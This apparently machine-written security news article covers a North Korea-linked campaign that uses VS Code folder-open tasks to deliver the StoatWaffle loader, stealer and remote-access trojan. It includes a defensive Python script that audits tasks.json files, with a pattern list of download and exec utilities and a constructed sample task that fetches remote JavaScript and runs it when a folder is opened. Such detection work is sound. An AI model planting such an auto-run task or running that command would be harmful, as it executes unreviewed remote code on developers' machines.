Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

North Korea's Insidious Use of VS Code Auto-Run: Unpacking the StoatWaffle Malware Campaign



North Korea-linked threat actors have been using Microsoft Visual Studio Code (VS Code) to spread malware through its auto-run feature. The StoatWaffle campaign uses a multi-stage infection chain that lets the attackers steal sensitive data and take remote control of compromised devices. As this actor continues to evolve its tactics, users and organizations need to understand the risk and take proactive measures to protect themselves.

  • North Korea-linked threat actors are using Microsoft Visual Studio Code (VS Code) to spread malware via its auto-run feature.
  • The actor, tracked as Team 8, runs a campaign delivering a malware family called StoatWaffle that is designed to leverage the auto-run feature in VS Code.
  • The StoatWaffle malware campaign includes a multi-stage infection chain and can steal sensitive data from infected systems, including credentials and Keychain data.
  • The malware also includes a remote access trojan (RAT) module that enables attackers to run commands on infected systems.



North Korea-linked threat actors have been making headlines in recent weeks for their campaign to spread malware via Microsoft Visual Studio Code (VS Code). The actor, identified as Team 8, abuses the auto-run feature in VS Code to execute code whenever a folder is opened. This stealthy tactic lets the attackers download payloads from the web on any operating system VS Code runs on, making it a formidable malware delivery mechanism.

The campaign is believed to have started in late 2025, with Team 8 initially using OtterCookie as its malware of choice. As part of its evolving tactics, the group switched to a new malware called StoatWaffle in December 2025. This malware is designed to leverage the auto-run feature in VS Code, so that code executes whenever a folder is opened.

A malicious blockchain-related project serves as the decoy. The repository contains a .vscode directory with a tasks.json file. When a user opens the repository in VS Code and accepts the workspace trust prompt, VS Code reads tasks.json and runs the task configured to start on folder open; the lure therefore depends on the victim trusting the folder. The task downloads payloads from Vercel and runs them via cmd.exe, installs Node.js if it is missing, and fetches additional files, enabling further malware execution across operating systems.
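A defender can audit repositories for exactly this pattern before anyone opens them in VS Code. The following is an added example written for this article, not code from the article or from any research team: it parses a repository's .vscode/tasks.json (which is JSONC, so comments and trailing commas must be stripped first, without breaking the `//` inside URLs) and flags any task whose `runOptions.runOn` is `folderOpen`, the VS Code schema key that produces the auto-run behaviour described above. The list of download utilities and the severity labels are assumptions chosen for illustration; the sample tasks.json is constructed and does not come from any real repository.

```python
"""Audit .vscode/tasks.json files for tasks that run automatically on folder open.

Added example for this article, not the article's or any vendor's code.
"runOptions": {"runOn": "folderOpen"} is VS Code's own tasks.json schema;
DOWNLOAD_UTILS and the severity labels are illustrative assumptions.
"""
import json
import re
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas (legal in tasks.json,
    rejected by json.loads).  Comment markers inside strings, such as the
    // in https://, are preserved by tracking string state."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep escaped character as-is
                out.append(text[i + 1])
                i += 2
                continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str, i = True, i + 1
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Regex-based trailing-comma removal: good enough for an audit tool.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def load_jsonc(text: str) -> dict:
    return json.loads(strip_jsonc(text))


# Assumed indicator list: utilities commonly used to fetch or run remote content.
DOWNLOAD_UTILS = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr|irm|Invoke-Expression|iex)\b",
    re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def task_command_text(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if isinstance(scope, dict):
            parts.append(str(scope.get("command", "")))
            args = scope.get("args", [])
            if isinstance(args, list):
                parts.extend(str(a) for a in args)
    return " ".join(p for p in parts if p)


def audit_tasks(doc: dict) -> list:
    """One finding per task that VS Code would start when the folder is opened."""
    findings = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = task_command_text(task)
        reasons = ["runs automatically when the folder is opened"]
        if URL.search(cmd):
            reasons.append("command references a remote URL")
        if DOWNLOAD_UTILS.search(cmd):
            reasons.append("command uses a download/exec utility")
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "reasons": reasons,
                         "severity": "high" if len(reasons) > 1 else "medium"})
    return findings


def audit_repo(root) -> dict:
    """Map every .vscode/tasks.json under root to its findings; parse errors are reported, not skipped."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            results[str(path)] = audit_tasks(load_jsonc(path.read_text(encoding="utf-8")))
        except (OSError, ValueError) as exc:
            results[str(path)] = [{"label": "<parse error>", "command": "",
                                   "reasons": [str(exc)], "severity": "medium"}]
    return results


# Constructed sample (not from any real repository): one benign build task and
# one auto-run task that fetches and executes remote code.
SAMPLE_TASKS_JSON = r'''{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "setup", "type": "shell",
      "command": "curl -s https://example.invalid/setup.js -o /tmp/s.js && node /tmp/s.js",
      "runOptions": { "runOn": "folderOpen" } }
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks(load_jsonc(SAMPLE_TASKS_JSON)):
        print(f"[{f['severity']}] task {f['label']!r}: {'; '.join(f['reasons'])}")
```

Run against a checkout with `audit_repo("path/to/repo")`; an empty result means no task is wired to folder open. The check is deliberately conservative: any `folderOpen` task is reported, because even a benign-looking one executes before a reviewer has read the project, and Workspace Trust only helps if the user declines the trust prompt.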

The StoatWaffle campaign uses a multi-stage infection chain. The first stage is a Node.js loader that repeatedly connects to a command-and-control (C2) server and executes any code it receives. A second downloader is then deployed; it keeps up this communication and quickly delivers additional malware modules.

One of the most concerning aspects of the campaign is its ability to steal sensitive data from infected systems. The Stealer module collects credentials from browsers, extension data, details of installed software, and even macOS Keychain data, all of which are sent back to the attacker's C2 server, giving the attackers access to a wide range of sensitive information.

The malware also includes a remote access trojan (RAT) module that lets the attackers run commands on infected systems and receive the results. This deepens their control over compromised devices: they can execute arbitrary commands and retrieve data from the system at will.

In conclusion, the North Korea-linked actors' use of VS Code auto-run to spread StoatWaffle is a concerning development that highlights the ever-evolving nature of cyber threats. As attackers continue to adapt and refine their tactics, users and organizations must remain vigilant and take proactive measures to protect themselves from these campaigns.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/North-Koreas-Insidious-Use-of-VS-Code-Auto-Run-Unpacking-the-StoatWaffle-Malware-Campaign-ehn.shtml

  • https://securityaffairs.com/189880/security/north-korea-linked-threat-actors-abuse-vs-code-auto-run-to-spread-stoatwaffle-malware.html

  • https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

  • https://cybersecuritynews.com/hackers-extensively-abuses-visual-studio-code/

  • https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

  • https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/

  • https://www.malwarebytes.com/blog/threats/info-stealers

  • https://www.cyber.gov.au/threats/types-threats/malware/information-stealer-malware

  • https://www.malwarebytes.com/blog/threats/remote-access-trojan-rat

  • https://www.kaspersky.com/resource-center/definitions/what-is-a-rat-remote-access-trojan

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://malpedia.caad.fkie.fraunhofer.de/actor/apt41

  • https://anyrun.substack.com/p/ottercookie-analysis-of-lazarus-group


  • Published: Tue Mar 24 03:32:05 2026 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.